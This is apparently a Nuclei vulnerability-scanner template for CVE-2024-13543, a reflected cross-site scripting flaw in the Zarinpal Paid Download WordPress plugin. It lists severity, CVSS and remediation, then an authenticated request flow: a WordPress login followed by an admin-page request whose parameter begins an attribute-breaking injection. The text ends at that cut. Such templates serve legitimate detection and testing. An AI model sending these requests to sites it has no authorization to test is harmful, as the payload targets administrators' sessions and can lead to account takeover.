id: CVE-2024-13543 info: name: Zarinpal Paid Download - Reflected XSS author: Sourabh-Sahu severity: medium description: | Zarinpal Paid Download WordPress plugin v2.3 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users such as admin, exploit requires attacker to craft a malicious link. impact: | Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or account compromise. remediation: | Update to the latest version of the plugin where the vulnerability is fixed or implement proper sanitization and escaping measures. reference: - https://wpscan.com/vulnerability/04a545c4-75d3-4672-8530-00bb879991ca/ - https://nvd.nist.gov/vuln/detail/CVE-2024-13543 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2024-13543 cwe-id: CWE-79 epss-score: 0.01706 epss-percentile: 0.82791 cpe: cpe:2.3:a:amini7:zarinpal_paid_download:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: amini7 product: zarinpal_paid_download tags: cve,cve2024,amini7,zarinpal-paid-download,wordpress,wp,wp-plugin,authenticated,xss flow: http(1) && http(2) http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to= matchers: - type: dsl dsl: - contains(header, "wordpress_logged_in") internal: true - raw: - | GET /wp-admin/admin.php?page=paid-downloads-add&ty=1">